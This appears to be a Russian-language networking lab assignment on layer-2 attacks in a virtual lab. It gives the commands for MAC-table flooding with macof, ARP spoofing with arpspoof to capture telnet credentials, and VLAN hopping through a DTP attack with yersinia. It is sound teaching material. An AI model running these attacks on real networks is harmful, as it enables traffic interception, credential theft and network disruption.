# **Практическая работа №2 Networks basic**
# L2. Основные атаки на L2
---
### Задание:
1) Провести атаки на канальном уровне модели OSI (L2)
2) Для формирования отчета - необходимо:
- Провести атаку и в отчете отразить команды, необходимы для выполнения данной атаки
- Приложить скриншот выполнения атаки, при возможности - результат атаки
## Часть 1. Переполнение таблицы коммутации
#### 1.1 Установим на kali linux необходимую утилиту
```sh
apt update
apt install dsniff -y
```
#### 1.2 Включим атаку и через несколько секунд остановим её с помощью ctrl+c
```sh
macof
```

#### 1.3 Увидим, что таблица коммутации switch7 переполнена

При этом другие устройства будут испытывать проблемы с сетью -- это можно проверить, запустив во время атаки обычный пинг.
---
## Часть 2. Arp-Spoofing
#### 2.1 Проверим, может ли win7 подключаться по telnet к switch7
```
telnet 192.168.1.100
```

#### 2.1 Настроим kali для атаки. Изменим параметры маршрутизации
```
nano /etc/sysctf.conf
```

Нужно раскомментировать строку и сохранить файл
#### 2.1 Применим изменения
```
sysctl -p /etc/sysctl.conf
```

#### 2.1 Начнём атаку

```
arpspoof -i eth0 -t 192.168.1.50 -r 192.168.1.100
```
---
где 50 -- адрес win7, 100 -- адрес switch7, eth0 -- сетевой интерфейс kali
---
:::info
Включите Wireshark на kali, после чего зайдите с win7 по telnet на switch7
**Задача**: Найдите Telnet трафик. Обнаружте в трафике аутентификационные данные пользователя.
:::

## Часть 3. VLAN hopping
#### 3.1 Поместим win10 в vlan10
---

---
```
Switch7(config)#int e1/2
```
---
```
Switch7(config-if)#switchport mode access
```
---
```
Switch7(config-if)#switchport access vlan 10
```
---
где е1/2 -- интерфейс, подключенный к win10
---
#### 3.2 Сконфигурируем trunk port на switch7
---

---
```
Switch7(config)#int e0/0
```
---
```
Switch7(config-if)#switchport trunk encapsulation dot1q
```
---
```
Switch7(config-if)#switchport mode trunk
```
---
где е0/0 -- интерфейс, подключенный к switch9
---
:::info
**Задача**: Настроить на switch9 интерфейсы е0/0, e0/1, e0/2 в trunk.
:::

#### 3.3 Настроим на роутере шлюз для vlan 10
---

---
```
Router(config)#int e0/1.10
```
---
```
Router(config-subif)#encapsulation dot1q 10
```
---
```
Router(config-subif)#ip address 192.168.10.1 255.255.255.0
```
---
:::info
После этих настроек Kali и Win10 будут доступны по сети, но трафик между ними будет проходить через маршрутизацию роутером. Используем атаку VLAN hopping, чтобы получить доступ в рамках широковещательного домена из Kali до win10.
:::
#### 3.4 Установим yersinia
---
```
apt install yersinia -y
```
---
#### 3.5 Запустим yersinia
---

---
```
yersinia -G
```
---
#### 3.6 Проведем атаку на протокол DTP

#### 3.7 Подготовим интерфейсы Kali

```
root@kali:# modprobe 8021q
root@kali:# vconfig add eth0 10
root@kali:# ifconfig eth0.10 up
```
где 10 -- vlan id
<aside>
💡 Далее можно выдать ip адрес на интерфейс eth0.10 из сети win10 и попробовать сгенерировать трафик к win10.
**Задача**: С помощью Wireshark проанализируйте исходящий трафик от Kali и найдите трафик с vlan id 10.
</aside>
